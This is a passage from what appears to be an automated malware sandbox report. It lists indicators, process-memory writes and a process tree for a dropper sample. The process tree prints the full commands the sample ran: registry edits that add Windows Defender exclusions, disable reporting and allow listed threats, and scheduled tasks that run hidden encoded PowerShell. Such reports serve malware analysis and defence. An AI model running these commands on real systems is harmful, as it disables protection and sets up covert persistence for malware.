\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 400 schtasks.exe 1012 schtasks.exe 2832 schtasks.exe 4200 schtasks.exe 4976 schtasks.exe 2280 schtasks.exe 1744 schtasks.exe 436 schtasks.exe 2036 schtasks.exe 1668 schtasks.exe 1724 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 964 powershell.EXE 964 powershell.EXE 5092 powershell.exe 5092 powershell.exe 1476 powershell.exe 1476 powershell.exe 3120 powershell.EXE 3120 powershell.EXE 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe 2596 gKfVXar.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 964 powershell.EXE Token: SeDebugPrivilege 5092 powershell.exe Token: SeDebugPrivilege 1476 powershell.exe Token: SeDebugPrivilege 3120 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2172 wrote to memory of 1160 2172 9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe 85 PID 2172 wrote to memory of 1160 2172 9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe 85 PID 2172 wrote to memory of 1160 2172 9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe 85 PID 1160 wrote to memory of 5092 1160 Install.exe 89 PID 1160 wrote to memory of 5092 1160 Install.exe 89 PID 1160 wrote to memory of 5092 1160 Install.exe 89 PID 1160 wrote to memory of 2280 1160 Install.exe 91 PID 1160 wrote to memory of 2280 1160 Install.exe 91 PID 1160 wrote to memory of 2280 1160 Install.exe 91 PID 5092 wrote to memory of 3232 5092 forfiles.exe 93 PID 5092 wrote to memory of 3232 5092 forfiles.exe 93 PID 5092 wrote to memory of 3232 5092 forfiles.exe 93 PID 3232 wrote to memory of 2392 3232 cmd.exe 94 PID 3232 wrote to memory of 2392 3232 cmd.exe 94 PID 3232 wrote to memory of 2392 3232 cmd.exe 94 PID 2280 wrote to memory of 1084 2280 forfiles.exe 95 PID 2280 wrote to memory of 1084 2280 forfiles.exe 95 PID 2280 wrote to memory of 1084 2280 forfiles.exe 95 PID 3232 wrote to memory of 2508 3232 cmd.exe 96 PID 3232 wrote to memory of 2508 3232 cmd.exe 96 PID 3232 wrote to memory of 2508 3232 cmd.exe 96 PID 1084 wrote to memory of 3740 1084 cmd.exe 97 PID 1084 wrote to memory of 3740 1084 cmd.exe 97 PID 1084 wrote to memory of 3740 1084 cmd.exe 97 PID 1084 wrote to memory of 1164 1084 cmd.exe 98 PID 1084 wrote to memory of 1164 1084 cmd.exe 98 PID 1084 wrote to memory of 1164 1084 cmd.exe 98 PID 1160 wrote to memory of 1744 1160 Install.exe 101 PID 1160 wrote to memory of 1744 1160 Install.exe 101 PID 1160 wrote to memory of 1744 1160 Install.exe 101 PID 1160 wrote to memory of 4008 1160 Install.exe 103 PID 1160 wrote to memory of 4008 1160 Install.exe 103 PID 1160 wrote to memory of 4008 1160 Install.exe 103 PID 964 wrote to memory of 3596 964 powershell.EXE 107 PID 964 wrote to memory of 3596 964 powershell.EXE 107 PID 1160 wrote to memory of 4452 1160 Install.exe 114 PID 1160 wrote to memory of 4452 1160 Install.exe 114 PID 1160 wrote to memory of 4452 1160 Install.exe 114 PID 1160 wrote to memory of 436 1160 Install.exe 116 PID 1160 wrote to memory of 436 1160 Install.exe 116 PID 1160 wrote to memory of 436 1160 Install.exe 116 PID 3980 wrote to memory of 5092 3980 mUNDKqg.exe 121 PID 3980 wrote to memory of 5092 3980 mUNDKqg.exe 121 PID 3980 wrote to memory of 5092 3980 mUNDKqg.exe 121 PID 5092 wrote to memory of 5108 5092 powershell.exe 123 PID 5092 wrote to memory of 5108 5092 powershell.exe 123 PID 5092 wrote to memory of 5108 5092 powershell.exe 123 PID 5108 wrote to memory of 1692 5108 cmd.exe 124 PID 5108 wrote to memory of 1692 5108 cmd.exe 124 PID 5108 wrote to memory of 1692 5108 cmd.exe 124 PID 5092 wrote to memory of 1968 5092 powershell.exe 125 PID 5092 wrote to memory of 1968 5092 powershell.exe 125 PID 5092 wrote to memory of 1968 5092 powershell.exe 125 PID 5092 wrote to memory of 4432 5092 powershell.exe 126 PID 5092 wrote to memory of 4432 5092 powershell.exe 126 PID 5092 wrote to memory of 4432 5092 powershell.exe 126 PID 5092 wrote to memory of 1284 5092 powershell.exe 127 PID 5092 wrote to memory of 1284 5092 powershell.exe 127 PID 5092 wrote to memory of 1284 5092 powershell.exe 127 PID 5092 wrote to memory of 1236 5092 powershell.exe 128 PID 5092 wrote to memory of 1236 5092 powershell.exe 128 PID 5092 wrote to memory of 1236 5092 powershell.exe 128 PID 5092 wrote to memory of 3428 5092 powershell.exe 129 PID 5092 wrote to memory of 3428 5092 powershell.exe 129
Processes
-
C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe"C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Users\Admin\AppData\Local\Temp\7zS8397.tmp\Install.exe.\Install.exe /S /site_id "525403"2⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3232 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:325⤵
- System Location Discovery: System Language Discovery
PID:2392
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:645⤵
- System Location Discovery: System Language Discovery
PID:2508
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1084 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:325⤵PID:3740
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:645⤵
- System Location Discovery: System Language Discovery
PID:1164
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHjVnDyYo" /SC once /ST 04:35:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:1744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHjVnDyYo"3⤵
- System Location Discovery: System Language Discovery
PID:4008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHjVnDyYo"3⤵
- System Location Discovery: System Language Discovery
PID:4452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 21:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\mUNDKqg.exe\" q8 /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:436
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3596
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3040
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4896
-
C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\mUNDKqg.exeC:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\mUNDKqg.exe q8 /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1692
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1360
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RqtPwFqMTiUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RqtPwFqMTiUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UBqYudvSNocU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UBqYudvSNocU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZUXSmeDRU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZUXSmeDRU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oXjeNNLqKAotC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oXjeNNLqKAotC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xonCRuklPFipnPeqKpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xonCRuklPFipnPeqKpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hrOORTLiECQfZJVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hrOORTLiECQfZJVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YSrBLfWUtIHnuviW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YSrBLfWUtIHnuviW\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2116 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:4440
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4512
-
-
